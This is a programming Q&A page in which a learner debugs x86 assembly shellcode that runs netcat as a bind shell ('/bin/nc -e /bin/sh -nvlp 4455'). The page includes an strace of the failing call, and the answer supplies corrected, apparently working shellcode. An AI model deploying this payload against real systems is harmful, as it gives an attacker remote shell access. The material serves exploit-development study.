Home > Software engineering >  Why is Netcat throws forward host lookup failed: Unknown host while using execve in assembly?
Why is Netcat throws forward host lookup failed: Unknown host while using execve in assembly?

Time:12-31

I have been learning buffer overflows and i am trying to execute the following command through shellcode /bin/nc -e /bin/sh -nvlp 4455. Here is my assembly code:

;Simple assembly execve call to execute /bin/ls -la 
;modified to execve > 
;/bin/nc -e /bin/sh -nvlp 4455

global _start

section .text

_start:

        xor eax, eax            ;create null eax register
        push eax                ;push null eax register to the stack

        push 0x636e2f2f         ;push command to the stack
        push 0x6e69622f         ;"/bin//nc"
        mov ebx, esp            ;move pointer to command into ebx

        push eax                ;push null eax register to the stack
        ;push 0x61616c2d        ;push argument to the stack "-laa"
        
        push 0x35353434     ;push "4455"
        push 0x20706c76     ;push "vlp "
        push 0x6e2d2068     ;push "h -n"
        push 0x7361622f     ;push "/bas"
        push 0x6e69622f     ;push "/bin"
        push 0x2f20652d     ;push "-e /"
        push 0x636e2f2f     ;push "//nc"
        push 0x6e69622f     ;push "/bin"
        mov esi, esp            ;move stack pointer to esi

        push eax                ;push null eax register to the stack
        push esi                ;push address of the argument to the stack
        push ebx                ;push address of the command to the stack
        mov ecx, esp            ;move pointer to start of the command to ecx
        
        mov edx,eax     ;null arguments for last execve (file, argv, envp)


        mov al, 0xb              ;define execve
        int 0x80                ;execute command

I am using the following commands to build the assembly file. I keep getting forward host lookup failed. Unknown Host error. Am I doing something wrong? I have

$ make all   
nasm -f elf32 shellcode.asm
ld -m elf_i386 -o shellcode shellcode.o
                                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/Desktop/assembly]
└─$ ./shellcode 
/bin//nc-e //bin/bash -nvlp 4455: forward host lookup failed: Unknown host

Here is strace output as well. It's so much gibberish for me, I couldn't even understand a line.

execve("./shellcode", ["./shellcode"], 0x7fffffffe070 /* 55 vars */) = 0
execve("/bin//nc", ["/bin//nc", "/bin//nc-e //bin/bash -nvlp 4455"], NULL) = 0
brk(NULL)                               = 0x55555555e000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=95011, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 95011, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fae000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\320\276\243\212\v\307^\t\263h8\371\266h\r\350"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1835120, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fac000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1868664, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7de3000
mprotect(0x7ffff7e09000, 1654784, PROT_NONE) = 0
mmap(0x7ffff7e09000, 1343488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7ffff7e09000
mmap(0x7ffff7f51000, 307200, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16e000) = 0x7ffff7f51000
mmap(0x7ffff7f9d000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b9000) = 0x7ffff7f9d000
mmap(0x7ffff7fa3000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fa3000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7de1000
arch_prctl(ARCH_SET_FS, 0x7ffff7fad600) = 0
mprotect(0x7ffff7f9d000, 12288, PROT_READ) = 0
mprotect(0x55555555c000, 4096, PROT_READ) = 0
mprotect(0x7ffff7ffb000, 8192, PROT_READ) = 0
munmap(0x7ffff7fae000, 95011)           = 0
getpid()                                = 15163
newfstatat(AT_FDCWD, "/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=74, ...}, 0) = 0
brk(NULL)                               = 0x55555555e000
brk(0x55555557f000)                     = 0x55555557f000
openat(AT_FDCWD, "/etc/host.conf", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=9, ...}, AT_EMPTY_PATH) = 0
read(3, "multi on\n", 4096)             = 9
read(3, "", 4096)                       = 0
close(3)                                = 0
openat(AT_FDCWD, "/etc/resolv.conf", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=74, ...}, AT_EMPTY_PATH) = 0
read(3, "# Generated by NetworkManager\nse"..., 4096) = 74
read(3, "", 4096)                       = 0
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=74, ...}, AT_EMPTY_PATH) = 0
close(3)                                = 0
getpid()                                = 15163
rt_sigaction(SIGINT, {sa_handler=0x555555557280, sa_mask=[INT], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=0x555555557280, sa_mask=[QUIT], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTERM, {sa_handler=0x555555557280, sa_mask=[TERM], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGURG, {sa_handler=SIG_IGN, sa_mask=[URG], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGPIPE, {sa_handler=SIG_IGN, sa_mask=[PIPE], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7ffff7e1f910}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
newfstatat(AT_FDCWD, "/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=74, ...}, 0) = 0
socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
connect(3, {sa_family=AF_UNIX, sun_path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
close(3)                                = 0
socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
connect(3, {sa_family=AF_UNIX, sun_path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
close(3)                                = 0
newfstatat(AT_FDCWD, "/etc/nsswitch.conf", {st_mode=S_IFREG|0644, st_size=542, ...}, 0) = 0
newfstatat(AT_FDCWD, "/", {st_mode=S_IFDIR|0755, st_size=36864, ...}, 0) = 0
openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=542, ...}, AT_EMPTY_PATH) = 0
read(3, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 542
read(3, "", 4096)                       = 0
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=542, ...}, AT_EMPTY_PATH) = 0
close(3)                                = 0
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=95011, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 95011, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fae000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\3202\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=47664, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 75544, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7dce000
mmap(0x7ffff7dd1000, 24576, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7ffff7dd1000
mmap(0x7ffff7dd7000, 8192, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x9000) = 0x7ffff7dd7000
mmap(0x7ffff7dd9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xa000) = 0x7ffff7dd9000
mmap(0x7ffff7ddb000, 22296, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7ddb000
close(3)                                = 0
mprotect(0x7ffff7dd9000, 4096, PROT_READ) = 0
munmap(0x7ffff7fae000, 95011)           = 0
openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=184, ...}, AT_EMPTY_PATH) = 0
lseek(3, 0, SEEK_SET)                   = 0
read(3, "127.0.0.1\tlocalhost\n127.0.1.1\tka"..., 4096) = 184
read(3, "", 4096)                       = 0
close(3)                                = 0
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=95011, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 95011, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fae000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\20\22\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=18504, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 20496, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7dc8000
mmap(0x7ffff7dc9000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1000) = 0x7ffff7dc9000
mmap(0x7ffff7dcb000, 4096, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7ffff7dcb000
mmap(0x7ffff7dcc000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7ffff7dcc000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libresolv.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260C\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=93080, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 105088, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7dae000
mprotect(0x7ffff7db2000, 73728, PROT_NONE) = 0
mmap(0x7ffff7db2000, 57344, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x4000) = 0x7ffff7db2000
mmap(0x7ffff7dc0000, 12288, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12000) = 0x7ffff7dc0000
mmap(0x7ffff7dc4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15000) = 0x7ffff7dc4000
mmap(0x7ffff7dc6000, 6784, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7dc6000
close(3)                                = 0
mprotect(0x7ffff7dc4000, 4096, PROT_READ) = 0
mprotect(0x7ffff7dcc000, 4096, PROT_READ) = 0
munmap(0x7ffff7fae000, 95011)           = 0
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=95011, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 95011, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7fae000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260!\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=31136, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 32984, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7da5000
mmap(0x7ffff7da7000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7ffff7da7000
mmap(0x7ffff7dab000, 4096, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7ffff7dab000
mmap(0x7ffff7dac000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7ffff7dac000
close(3)                                = 0
mprotect(0x7ffff7dac000, 4096, PROT_READ) = 0
munmap(0x7ffff7fae000, 95011)           = 0
write(2, "/bin//nc-e //bin/bash -nvlp 4455"..., 62) = 62
write(2, "Unknown host", 12)            = 12
write(2, "\n", 1)                       = 1
close(-1)                               = -1 EBADF (Bad file descriptor)
exit_group(1)                           = ?
    exited with 1    

Result of env command:

COLORFGBG=15;0
COLORTERM=truecolor
COMMAND_NOT_FOUND_INSTALL_PROMPT=1
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
DESKTOP_SESSION=lightdm-xsession
DISPLAY=:0.0
DOTNET_CLI_TELEMETRY_OPTOUT=1
GDMSESSION=lightdm-xsession
GDM_LANG=en_US.utf8
GTK_MODULES=gail:atk-bridge
HOME=/home/kali
LANG=en_US.UTF-8
LANGUAGE=
LOGNAME=kali
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/home/kali/.local/bin
POWERSHELL_TELEMETRY_OPTOUT=1
POWERSHELL_UPDATECHECK=Off
PWD=/home/kali/Desktop/assembly
QT_ACCESSIBILITY=1
QT_AUTO_SCREEN_SCALE_FACTOR=0
QT_QPA_PLATFORMTHEME=qt5ct
SESSION_MANAGER=local/kali:@/tmp/.ICE-unix/1132,unix/kali:/tmp/.ICE-unix/1132
SHELL=/usr/bin/zsh
SSH_AGENT_PID=1180
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXkm5FhN/agent.1132
TERM=xterm-256color
USER=kali
WINDOWID=0
XAUTHORITY=/home/kali/.Xauthority
XDG_CONFIG_DIRS=/etc/xdg
XDG_CURRENT_DESKTOP=XFCE
XDG_DATA_DIRS=/usr/share/xfce4:/usr/local/share/:/usr/share/:/usr/share
XDG_GREETER_DATA_DIR=/var/lib/lightdm/data/kali
XDG_MENU_PREFIX=xfce-
XDG_RUNTIME_DIR=/run/user/1000
XDG_SEAT=seat0
XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0
XDG_SESSION_CLASS=user
XDG_SESSION_DESKTOP=lightdm-xsession
XDG_SESSION_ID=9
XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0
XDG_SESSION_TYPE=x11
XDG_VTNR=7
_JAVA_OPTIONS=-Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
SHLVL=1
OLDPWD=/home/kali/Desktop
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
LESS_TERMCAP_mb=
LESS_TERMCAP_md=                                                                                           
LESS_TERMCAP_me=                                                                                           
LESS_TERMCAP_so=
LESS_TERMCAP_se=                                                                                           
LESS_TERMCAP_us=
LESS_TERMCAP_ue=                                                                                           
_=/usr/bin/env

CodePudding user response:

As you can see in strace, the execve command executes as: execve("/bin//nc", ["/bin//nc", "/bin//nc-e //bin/bash -nvlp 4455"], NULL) = 0 It seems to be taking the whole /bin//nc-e //bin/bash -nvlp 4455 as a single argument and thus thinks it's a hostname. In order to get around that, the three argv[] needed for execve() is pushed seperately. argv[]=["/bin/nc", "-e/bin/bash", "-nvlp4455"] These arguments are each pushed into edx, ecx, and ebx. since ebx needs to be /bin/nc, which was already done in the original code. we just needed to push 2nd and 3rd argv[] into ecx and edx and push it into stack. After that we just copy the whole stack into ecx, and then xor edx,edx to set edx as NULL.

Here is the correct solution:

BITS 32
;Simple assembly execve call to execute /bin/ls -la 
;modified to execve > 
;/bin/nc -e /bin/sh -nvlp 4455

global _start

section .text


_start:

        xor eax, eax            ;create null eax register
;        imul eax

;EBX = /bin/bash
        push eax                ;push null eax register to the stack
        push 0x636e2f2f         ;push command to the stack
        push 0x6e69622f         ;"/bin//nc"
        mov ebx, esp            ;move pointer to command into ebx

        push eax                ;push null eax register to the stack

;EDX = "-nvlp4455"
        push word 0x35      ;push "5"
        push 0x35343470     ;push "p445"
        push 0x6c766e2d     ;push "-nvl"
        mov edx, esp        ; store last argv[] is edx. and push to stack

; ECX = "/bin/bash"
        push eax        ; push null
        push 0x68736162     ;push "bash"
        push 0x2f2f6e69     ;push "in//"
        push 0x622f652d     ;push "-e/b"
        mov ecx, esp        ; store 2nd argv[] in ecx and push to stack

;PUSH all arguments to stack and set it to ECX
        push eax        ;push null eax register to the stack
        push edx        ; push "-nvlp4455"
        push ecx        ;;push "-e/bin/bash" 
        push ebx                 ;push "/bin/nc"
        mov ecx, esp            ;move pointer to start of the command to ecx
        
        xor edx,edx     ;null arguments for last envp[]


        mov al, 0xb              ;define execve
        int 0x80                ;execute command
  • Related